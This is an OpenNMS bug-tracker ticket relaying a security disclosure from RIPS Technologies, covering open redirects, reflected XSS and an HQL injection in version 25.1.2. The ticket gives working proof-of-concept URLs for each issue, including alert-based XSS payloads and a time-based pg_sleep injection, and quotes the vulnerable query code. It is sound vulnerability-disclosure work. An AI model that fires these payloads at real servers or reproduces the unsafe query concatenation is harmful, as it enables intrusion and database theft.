Details
-
Bug
-
Status: Resolved (View Workflow)
-
Major
-
Resolution: Fixed
-
25.1.2
-
Security Level: Default (Default Security Scheme)
-
Horizon 2020 - March 18th, Horizon 2020 - April 1st
Description
Multiple security issues reported via e-mail by Johannes Moritz (RIPS Technologies), who would like to be credited in release notes.
jmoritz and dbrinkrolf are the usernames for e-mail contact. Both are at ripstech.com.
Hi,
We found several security issues in OpenNMS with our static code analysis engine RIPS.
The severity of the found issues is from low to critical:
- 3 Open Redirect vulnerabilities (low)
- 9 Reflected Cross-Site Scripting issues (medium)
- 1 HQL Injection (critical)
We have verified the issues with OpenNMS 25.1.2 (openjdk version "11.0.5" and xubuntu 18.04).
You will find the details in the attached markdown file.
I would be happy if you could credit me in the release notes or in the CVE details with "Johannes Moritz (RIPS Technologies)".
If you have further questions, don't hesitate to contact my colleague (in CC).
Best regards,
Johannes Moritz
Referenced markdown file follows.
[RIPS] found 3 Open Redirect issues in the following files of OpenNMS 25.1.2:
- AcknowledgeAlarmController
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/java/org/opennms/web/controller/alarm/AcknowledgeAlarmController.java - AcknowledgeNotificationController
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/java/org/opennms/web/controller/notification/AcknowledgeNotificationController.java - AcknowledgeAlarmByFilterController
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/java/org/opennms/web/controller/alarm/AcknowledgeAlarmByFilterController.java
The first issue can be exploited via the GET parameter `redirect` by accessing the following URL:
`http://192.168.56.102:8980/opennms/alarm/acknowledge?redirect=http://google.com&actionCode=unack&alarm=1`
The second issue can be exploited via the GET parameter `redirect` by accessing the following URL:
`192.168.56.102:8980/opennms/notification/acknowledge?redirect=http://google.com¬ices=1`
The third issue can be exploited via the GET parameter `redirect` by accessing the following URL:
`http://192.168.56.102:8980/opennms/alarm/acknowledgeByFilter?redirect=http://google.com&actionCode=unack`
For more information about fixing an OpenRedirect see:
##Reflected Cross-Site Scripting
We found 9 reflected XSS issues in the following files of OpenNMS 25.1.2:
- load-assets.jsp:
https://github.com/OpenNMS/opennms/blob/master/core/web-assets/src/main/assets/static/load-assets.jsp - resultsIndexNoCount.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndexNoCount.jsp - resultsIndex.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndex.jsp - notification-box.jsp
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/notification-box.jsp
###1. load-assets.jsp
There are 2 reflected XSS issues in the file `load-assets.jsp`
Both issues can be triggered without authentication.
- The first issue can be exploited via the GET parameter `asset-async` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=a%22%3Ealert(1)//&asset-media=b&asset-defer=true&asset=vaadin-theme&asset=print.js&asset-type=js`
- The second issue can be exploited via the GET parameter `asset-media` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=&asset-media=b%22%3E%3Cscript%3Ealert(1)%3C/script%3E&asset-defer=true&asset=vaadin-theme&asset=print&asset-type=css`
###2. resultsIndexNoCount.jsp
There are 3 XSS issues in the file `resultsIndexNoCount.jsp`. These issues require the victim to be authenticated.
- The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&multiplename=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
- The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&limitname=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
- The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
###3. resultsIndex.jsp
There are 3 XSS issues in the file `resultsIndex.jsp`. These issues require the victim to be authenticated.
- The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&multiplename=a%22%3E%3Csvg/onload=alert(1)%3E`
- The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&limitname=a%22%3E%3Csvg/onload=alert(1)%3E`
- The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&limit=9`
###4. notification-box.jsp
- There is 1 XSS issue in the file `notification-box.jsp` and can be triggered via the GET parameter `node` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/notification-box.jsp?node=tset%22%3E%3Csvg/onload=alert(1)%3E`
Information about fixing XSS issues can be found here:
##HQL Injection
There is a HQL Injection in the NodeListController endpoint of OpenNMS. The HQL injection requires privileges of the role "ROLE_USER" (low privilege user).
The GET parameters `snmpParmValue` and `snmpParm` are concatenated into a HQL query in the function `org.opennms.web.svclayer.support.addCriteriaForSnmpParm`.
The concatenation of user input into a database query is insecure since malicious HQL commands can be injected and arbitrary data can be read from the database.
The following Listing shows the vulnerable function.
```java
private static void addCriteriaForSnmpParm(OnmsCriteria criteria,
String snmpParm, String snmpParmValue, String snmpParmMatchType) {
criteria.createAlias("node.ipInterfaces", "ipInterface");
criteria.add(Restrictions.ne("ipInterface.isManaged", "D"));
criteria.createAlias("node.snmpInterfaces", "snmpInterface");
criteria.add(Restrictions.ne("snmpInterface.collect", "D"));
if(snmpParmMatchType.equals("contains"))
else if(snmpParmMatchType.equals("equals")) {
snmpParmValue = snmpParmValue.toLowerCase();
criteria.add(Restrictions.sqlRestriction("
.nodeid in (select nodeid from snmpinterface where snmpcollect != 'D' and lower(snmp" + snmpParm + ") = '" + snmpParmValue + "')"));
}
}
```
When accessing the following URL we can execute the `PostgreSQL` function `pg_sleep`:
`http://192.168.56.102:8980/opennms/element/nodeList.htm?snmpParm=collect&snmpParmValue=ab%27+and+%24%24%3D%27%24%24%3Dchr(61)||chr(39)and(select+pg_sleep(6))%3A%3Atext%3Dchr(39))+--&snmpParmMatchType=equals&listInterfaces=true`
For more information see:
Attachments
Issue Links
- depends on
-
NMS-12572 HQL Injection
-
- Resolved
-